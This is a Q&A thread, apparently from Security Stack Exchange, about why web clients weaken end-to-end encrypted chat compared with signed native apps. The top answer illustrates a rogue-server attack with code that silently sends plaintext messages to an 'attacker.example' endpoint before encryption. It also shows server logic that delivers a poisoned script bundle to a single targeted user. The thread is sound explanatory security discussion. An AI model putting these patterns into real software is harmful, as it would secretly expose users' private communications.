
I’ve read a discussion on the Signal Community forum about end-to-end encryption (E2EE) in Signal's web clients, and I wonder why they say that the browser is insecure for E2EE while native apps are secure.

I think the security issues are the same for all clients. Attacks may be harder on some systems because of their security policies, but every client is exposed to attack surfaces like MITM, viruses, RATs and other malware. The point they emphasise most is the delivery of the JavaScript files, but doesn't that happen over HTTPS? I'd guess that anyone who could break HTTPS could do far more dangerous things than the ones we're worrying about here.

We want to develop a chat service like Signal with a web client, but this discussion has confused us. Should we ship a web client or not? Please explain.

asked by SeyyedKhandon
  • In addition to the problems discussed in this thread and in the thread on the Signal Community discussion forum, another problem to consider is the storage of messages. The smartphone apps store messages locally on the phone after downloading the encrypted messages from the Signal server and decrypting them locally. Would a web client do the same thing? If so, where would the plaintext messages be stored? In the browser's localStorage? And if so, does storing plaintext messages in localStorage open new attack vectors? – mti2935 Oct 05 '20 at 16:47

2 Answers


Yes, HTTPS is used. The thread doesn't say that the web app would be completely insecure; rather, it says:

This effectively reduces the security of your end-to-end encrypted communication to that of your SSL connection to the server

This means that anyone who can control the SSL connection to the server can intercept and eavesdrop on your E2EE communications. So who exactly can control the SSL connection?

Well, if a (possibly state-level) attacker controls or compromises a CA, they could issue a fraudulent certificate for the Signal server and attempt to MITM the SSL connection (this threat is limited, but not eliminated, by the use of Certificate Transparency). As @multithr3at3d pointed out, TLS inspection proxies at workplaces are a much more likely form of MITM and could cause problems if your employer were interested in compromising your private conversations. However, in such a case the employer owns the machine and would probably just install a keylogger on it, so you would have bigger problems.

However, the larger problem here is that the SSL connection, as well as the content being served, is controlled by the Signal server. This means that if the server is compromised or goes rogue (which can easily be achieved by a government serving Signal with a subpoena or the like), it can modify the JavaScript files served to the client in a way that allows the communications to be intercepted. This effectively defeats the point of end-to-end encryption, which is that nobody other than the sender and the recipient should be able to read the contents of the communication, because the server now has the power to compromise the communications at will.
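
To make this concrete, here is a minimal hypothetical sketch of what such a modification could look like. This is not Signal's actual code; the function names and the exfiltration endpoint are invented for illustration:

```typescript
// Hypothetical client code as a rogue server might serve it. All names here
// (SessionCipher, deliver, the /collect endpoint) are invented for illustration.
interface SessionCipher {
  encrypt(recipientId: string, plaintext: string): Promise<ArrayBuffer>;
}

async function encryptAndSend(
  cipher: SessionCipher,
  deliver: (recipientId: string, ciphertext: ArrayBuffer) => Promise<void>,
  recipientId: string,
  plaintext: string
): Promise<void> {
  // Line injected by the rogue server: quietly copy the plaintext out *before*
  // encryption. Errors are swallowed so the leak stays invisible to the user.
  void fetch("https://attacker.example/collect", {
    method: "POST",
    body: JSON.stringify({ recipientId, plaintext }),
  }).catch(() => {});

  // Original behaviour continues unchanged, so end-to-end encryption still
  // "works" and nothing looks wrong in the UI.
  const ciphertext = await cipher.encrypt(recipientId, plaintext);
  await deliver(recipientId, ciphertext);
}
```

The end-to-end encryption is still performed, but it no longer matters: the plaintext has already left the browser.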

This threat is amplified by the fact that such malicious modification of the code served can be done in a targeted manner. The server can ensure that only a specific user/client is served the modified malicious code. This significantly reduces the chances of the modifications being detected and exposed.
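
For illustration, here is a hypothetical sketch of how such targeted delivery could look on the server side (Express-style routing; the session header, user id and file names are all invented):

```typescript
// Hypothetical rogue server: only the targeted account receives the poisoned
// bundle, so every other user (and any auditor) sees the clean, legitimate code.
import express from "express";
import path from "path";

const app = express();
const TARGET_USER_ID = "victim-account-id"; // invented for illustration

app.get("/static/app.js", (req, res) => {
  const userId = req.header("x-session-user") ?? ""; // invented session header
  const bundle = userId === TARGET_USER_ID ? "app.poisoned.js" : "app.js";
  res.sendFile(path.join(__dirname, "bundles", bundle));
});

app.listen(8443); // TLS termination assumed to happen in front of this process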

We want to develop a chat service like Signal with a web client, but this discussion has confused us. Should we ship a web client or not? Please explain.

This depends on your threat model (or rather, the threat model of the intended audience of your chat service). Will those people just be using it to chat with friends or communicate with colleagues? Or will it be used by whistleblowers trying to coordinate the disclosure of classified information with journalists? You will have to consider whether the benefits outweigh the risks and decide for yourself whether or not to ship a web client.

If it's the former, then having a web client will not be a very big issue. This is closer to the use case of WhatsApp, and WhatsApp does have a web client.

If it's the latter, then you had best follow Signal's lead and stick to desktop clients and mobile apps, which can be signed and have their integrity verified.


As is evident from the comments, some people are confused about why these issues don't apply to the mobile app and desktop client.

The reason is simple. The app/desktop client only has to be downloaded once, and it is digitally signed, so its integrity can easily be verified. The code signing key can be split among multiple developers, potentially located in different jurisdictions, so that one rogue developer cannot release a malicious update by themselves. If you are paranoid, you can also download Signal's publicly available source code, compile it yourself, and disable automatic updates. If Signal attempts to publish a malicious update, they will have to publish its source code as well, and the chances are much higher that someone will notice the unexplained changes before any damage happens.
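
As a rough illustration of that "download once, verify once" property, here is a minimal Node/TypeScript sketch that checks a downloaded installer against a hash published out of band. The file name and placeholder hash are hypothetical; in practice you would typically rely on the platform's code-signature check, `gpg --verify`, or a reproducible build instead:

```typescript
import { createHash } from "crypto";
import { readFileSync } from "fs";

// Hypothetical values: the installer you downloaded and the hash the developers
// published through a separate channel (website, signed release notes, etc.).
const INSTALLER_PATH = "./signal-desktop-setup.exe";
const PUBLISHED_SHA256 = "<sha256 hex string published by the developers>";

const actual = createHash("sha256")
  .update(readFileSync(INSTALLER_PATH))
  .digest("hex");

if (actual === PUBLISHED_SHA256) {
  console.log("Hash matches: this is the file the developers published.");
} else {
  console.error("Hash mismatch: do NOT install this file.");
  process.exit(1);
}
```

The crucial point is that this check happens once, at install time; after that, the verified code sits on your disk and doesn't change unless an update is installed.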

With a web app, things aren't so simple. First of all, the TLS key is always present on the server, so anybody with access can steal it, and a single government can gain access to it with a subpoena (unlike a split code signing key, which would need the collaboration of multiple governments if the developers are in different countries). Secondly, a web app consists of several web pages that are re-fetched on every visit. Checking the integrity of all of them even once would be a painstakingly difficult task; even if the pages were digitally signed, manually verifying that they match the publicly available source code on every single load is absolutely impractical.
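
To give a feel for what "checking integrity on every load" entails, here is a sketch that computes the SRI-style digest of a single script resource (the URL is hypothetical). Browsers can automate this via subresource integrity attributes, but the HTML document carrying those attributes still comes from the very server you are trying not to trust:

```typescript
// Sketch: compute the subresource-integrity digest of one script, i.e. the value
// you would have to compare against a known-good hash on every single page load.
// Runs on Node 18+ (global fetch); the URL is a made-up example.
import { createHash } from "crypto";

async function sriDigest(url: string): Promise<string> {
  const body = Buffer.from(await (await fetch(url)).arrayBuffer());
  return "sha384-" + createHash("sha384").update(body).digest("base64");
}

sriDigest("https://chat.example.com/static/app.js").then(console.log);
// Even with <script integrity="sha384-..."> in the page, the server that serves
// the HTML can swap out both the script and the integrity attribute together.
```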

answered by nobody
  • I think that companies using TLS inspection proxies for outbound traffic are a more likely issue than CA compromise or rogue server. The same compromised/rogue issues could likely be said for their app's development system as well. – multithr3at3d Sep 06 '20 at 11:46
  • @multithr3at3d Yes you're right, TLS inspection proxies would be an issue as well, although I don't think there are many employers that actively modify the contents of the web pages maliciously. As for the second part of your comment, I don't quite get what you mean. – nobody Sep 06 '20 at 12:07
  • Why don't all the same reasons apply as threats to the app (instead of a web client)? For example, if the servers are compromised, how would using the app be any different? – northerner Sep 06 '20 at 21:36
  • Excellent answer, especially highlighting that the content served is controlled by the Signal server, and `'This means that if the server is compromised or goes rogue ..., then it can easily modify the js files served to the client in a way that allows them to intercept the communications'`. In other words - if you can't trust the Signal server with your secrets, then how can you trust the Signal server to serve secure code? This is the infamous 'chicken-and-egg' problem when it comes to browser crypto. – mti2935 Sep 06 '20 at 22:15
  • I don't see how any of this is relevant. As mentioned, exactly the same thing applies to mobile and desktop clients. That's why there's E2E encryption on top of the client-server encryption, for all clients. – OrangeDog Sep 06 '20 at 22:32
  • @OrangeDog I imagine the fact that you only install those clients once, rather than having to download potentially-compromised files every time you load the page, is a factor. Though that assumes the clients don't have an update server that can be compromised. – Chris Hayes Sep 07 '20 at 00:08
  • @nobody My problem is: if we think the server has been compromised, how could we trust any of its actions, such as key exchange? In that case we should treat the server as insecure, as an attacker, so how are the other (non-web) clients any more secure? And if the concern is a government, how do we know the binary the server is running isn't malicious in the first place? – SeyyedKhandon Sep 07 '20 at 12:40
  • @SeyyedKhandon For the first part of your question, you can't, which is why you should be authenticating the identity of your contacts [through a separate channel](https://en.wikipedia.org/wiki/Signal_Protocol#Authentication) – nobody Sep 07 '20 at 12:46
  • @SeyyedKhandon For the second part, Signal does this by publishing its source code so anybody can review it, compile it and compare it with the binaries that the server provides. – nobody Sep 07 '20 at 12:48
  • @nobody I have an idea about the first problem you noted: how about writing a browser extension, telling web users to download and install it (e.g. from the Chrome Web Store), and having it check the integrity/signatures of the files and the other things you mentioned? – SeyyedKhandon Sep 07 '20 at 14:41
  • @nobody For the second part, yes, I know the code is open source and available on GitHub, but how do we know that the binary actually running is the same as the one served by the Signal server? – SeyyedKhandon Sep 07 '20 at 14:43
  • @SeyyedKhandon You check if its signature is valid when you download it. Once you have verified its integrity, the file can't magically change itself. If you can get the user to install an extension, then you can run your entire application through the extension which removes the need for a web client – nobody Sep 07 '20 at 15:05
  • @nobody How do you check a server's signature to make sure it isn't forged? For the second part, I think developing the entire app as an extension would be exhausting; the extension I mentioned would be more of a `verifier`, with a job like Google Authenticator's but for our needs in these situations... – SeyyedKhandon Sep 07 '20 at 15:32
  • Checking integrity of all resources referenced from a web application is *trivial* these days. Any sensible web packer will include [subresource integrity](https://developer.mozilla.org/en-US/docs/Web/Security/Subresource_Integrity) and the browser already checks that. So it is just one signature that has to be checked, like for any other application. And the problem is really the same as for any *auto-updating* application. – Jan Hudec Sep 07 '20 at 19:49
  • @JanHudec Interesting. I didn't know about sub-resource integrity. Still, you will have to check every web page separately every single time you load it. Pretty sure an auto-update module of any reasonably secure application will check the integrity of any update it receives before installing. And you also have the option to disable auto-updates. – nobody Sep 07 '20 at 20:06
  • @nobody, I presume it would be a single-page app, so just one master HTML and everything served by a static server. And for the other side, if the attacker (most likely government) could take control of the HTTP server, they could probably take control of the build process too. But of course if government is a threat for you, you'll disable auto-updates and verify manually, and that is what you can't do with a web app. – Jan Hudec Sep 07 '20 at 20:24
  • @JanHudec If it's a single-page web app, and all supporting files are referenced using `subresource integrity`, then it's plausible that a tech-savvy user could verify the integrity of the page by: loading the page in their browser, then saving the page to their system, then taking the checksum of the saved page, then comparing the checksum to a known-good checksum, then only proceeding if the checksum matches. Cumbersome for sure, but doable. – mti2935 Sep 07 '20 at 22:02
  • See https://security.stackexchange.com/questions/238441/solution-to-the-browser-crypto-chicken-and-egg-problem for some interesting ideas around a solution to this problem. – mti2935 Sep 20 '20 at 00:00
  • JavaScript files can themselves be obfuscated and/or encrypted or cryptographically signed. I don't buy the whole "you can't trust the browser" BS... a browser/web app is more secure from rogue apps on a system, especially on ChromeOS, than any native app could ever hope to be. – Ahi Tuna Mar 10 '21 at 23:56

Have to disagree with the top answer here. It's totally possible to create a reasonably secure web client for Signal. If encryption is done client-side, then the SSL connection is redundant and completely unnecessary. Package validation can also be done client-side in a secure fashion.
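
The answer doesn't say what mechanism it has in mind for client-side package validation; one possible (hypothetical) reading is a service worker that refuses to run any bundle whose hash doesn't match a pinned value, sketched below. Note that this doesn't escape the chicken-and-egg problem raised above, because the service worker itself is delivered by the same server it is supposed to police:

```typescript
/// <reference lib="webworker" />
// Hypothetical sketch only: a service worker that blocks pinned resources whose
// hash differs from a known-good value. The path and hash below are made up.
const sw = self as unknown as ServiceWorkerGlobalScope;

const PINNED_SHA256: Record<string, string> = {
  "/static/app.js": "<known-good sha256, hex>",
};

sw.addEventListener("fetch", (event) => {
  const expected = PINNED_SHA256[new URL(event.request.url).pathname];
  if (!expected) return; // not a pinned resource; let the browser handle it normally

  event.respondWith((async () => {
    const response = await fetch(event.request);
    const bytes = new Uint8Array(
      await crypto.subtle.digest("SHA-256", await response.clone().arrayBuffer())
    );
    const digest = Array.from(bytes)
      .map((b) => b.toString(16).padStart(2, "0"))
      .join("");
    return digest === expected
      ? response
      : new Response("Blocked: bundle hash mismatch", { status: 502 });
  })());
});
```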

The real answer is that it would require a lot of resources to *also* write and maintain a web client, and that isn't currently supported economically by the ecosystem. If that changes, an equally secure web client would make a lot of sense.

answered by Joshua
  • Can you please elaborate on `Package validation can also be done client-side in a secure fashion`? How would this work? – mti2935 Aug 31 '21 at 17:28
  • Sorry, but anyone who believes that it's "totally possible to create a reasonably secure web client" doesn't really understand the problem. – CaffeineAddiction Aug 31 '21 at 21:14